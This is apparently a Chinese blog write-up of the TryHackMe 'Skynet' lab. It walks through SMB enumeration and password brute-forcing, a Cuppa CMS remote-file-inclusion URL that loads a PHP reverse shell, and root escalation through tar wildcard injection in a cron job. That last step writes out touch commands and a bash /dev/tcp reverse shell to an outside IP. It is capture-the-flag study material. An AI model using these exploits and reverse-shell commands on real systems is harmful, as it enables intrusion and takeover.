📌 目录

    【THM】Skynet 天网

    【THM】Skynet 天网

    信息收集

    image-20250402181119435

    我们先用nmap扫描目标ip,发现打开了如下端口

    我们先进入网站,没有什么值得注意的东西

    image-20250402163437577

    我们考虑下从smb入手,利用msf的scanner/smb/smb_enumshares模块,image-20250402164037234

    发现有一个milesdyson的分享,猜测我们需要的答案就在其中,我们只知道用户名Miles,不知道密码,于是先去anonymous中查看有没有线索

    image-20250402164241526

    attention.txt中是Miles让大家改密码,结合下面的logs文件夹,猜测密码在日志中

    image-20250402164424185

    只有log1.txt有数据,其内容是一个字典,利用msf的scanner/smb/smb_login模块,成功爆破出密码cyborg007haloterminatorimage-20250402164558645

    获取SHELL

    下一题是找隐藏的目录,我们通过gobuter进行目录爆破

    gobuster dir -u target_ip -w /usr/share/wordlist/dirbuster/directory-list-2.3-medium.txt -s 200,301 --status-code-blacklist ""
    

    爆破出目录squirrelmail,进入登陆页面,输入之前获得的账号密码

    image-20250402183753089

    image-20250402183849496

    image-20250402183934093

    可以知道milesdyson的smb密码为)s{A&2Z=F^n_E.B`,通过smb连接到milesdyson的share,可以在notes的目录下发现可疑文件image-20250402184445539

    image-20250402184540722

    让我们去网站的/45kra24zxs28v3yd目录下查看,啥也没有,选择目录爆破image-20250402190149420

    找到administrator这个目录,进入后发现又是登陆页面,尝试之前的账号密码无果image-20250402190226681

    该CMS为Cuppa CMS,去exploit db找找有无漏洞

    image-20250402190614789

    http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
    #这是exp代码,仅需修改
    

    我们需要上传一个php反向shell,比如php-reverse-shell,我们需要先修改ip和监听端口,然后利用nc监听端口image-20250402191704632

    为了能访问到该文件,我们在目录下开启python的临时服务器image-20250402191746840

    http://10.10.194.60/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://your_ip:your_port/php-reverse-shell.php
    

    成功获取shellimage-20250402191931727

    在/home/milesdyson目录下找到user.txtimage-20250402192039434

    提权

    然后我们需要提权,尝试查找可利用的suid文件或者root权限的二进制文件无果后,后面在/etc/crontab找到了一个定时任务backup.sh,image-20250402201057332

    查看内容,含义是在打包/var/www/html目录下除隐藏文件外的所有文件到/home/milesdyson/backups/backup.tgzimage-20250402201237626

    然后去https://gtfobins.github.io/gtfobins/tar/#shell查找tar用法,image-20250402201131566

    观察比对不同,我想到可以通过创建“--checkpoint=1”和“--checkpoint-action=exec=/bin/bash”的文件来是backup.sh执行的命令变成

    tar cf /home/milesdyson/backups/backup.tgz --checkpoint=1 --checkpoint-action=exec=/bin/sh
    

    不过尝试后发现/bin/bash没有实际用处,我还需要一个反弹shell

    cd /var/www/html
    touch "/var/www/html/--checkpoint=1"
    touch "/var/www/html/--checkpoint-action=exec=bash reverse.sh"
    echo "/bin/bash -i >& /dev/tcp/10.6.14.150/4567 0>&1" > /var/www/html/reverse.sh
    

    等待一分钟,让计划执行image-20250402202820210

    成功获取root权限的shell,查看/root下的root.txt

    image-20250402202914289

    image-20250402202959845

    posted @ 2025-04-02 20:32  羽弥YUMI  阅读(44)  评论(0)    收藏  举报